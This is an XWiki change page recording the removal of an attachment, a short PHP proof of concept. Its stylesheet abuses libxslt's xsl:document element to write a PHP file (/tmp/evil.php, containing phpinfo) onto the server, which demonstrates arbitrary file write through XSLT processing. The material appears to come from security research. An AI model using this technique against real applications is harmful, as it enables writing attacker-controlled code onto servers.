Changes for page Application_PHP5

Last modified by Nicolas Gregoire on 2012/02/02 17:29

From version Icon 3.1 Icon
edited by Nicolas Gregoire
on 2012/01/13 16:28
Change comment: Upload new attachment create-file-via-libxslt.php
To version Icon 2.1 Icon
edited by Nicolas Gregoire
on 2012/01/13 16:27
Change comment: There is no comment for this version

Summary

Details

Icon create-file-via-libxslt.php
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -601 bytes
Content
... ... @@ -1,33 +1,0 @@
1 -<?php
2 -
3 -$sXml = '<empty/>';
4 -
5 -$sXsl = <<<EOT
6 -<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
7 -
8 - <xsl:template match="/">
9 - <xsl:document href="/tmp/evil.php" method="text">
10 - <xsl:text><![CDATA[<?php phpinfo() ?>]]></xsl:text>
11 - </xsl:document>
12 - </xsl:template>
13 -
14 -</xsl:stylesheet>
15 -EOT;
16 -
17 -# LOAD XML FILE
18 -$XML = new DOMDocument();
19 -$XML->loadXML( $sXml );
20 -
21 -# LOAD XSLT FILE
22 -$XSL = new DOMDocument();
23 -$XSL->loadXML( $sXsl );
24 -
25 -# START XSLT
26 -$xslt = new XSLTProcessor();
27 -$xslt->importStylesheet( $XSL );
28 -
29 -# TRASNFORM & PRINT
30 -print $xslt->transformToXML( $XML );
31 -
32 -?>
33 -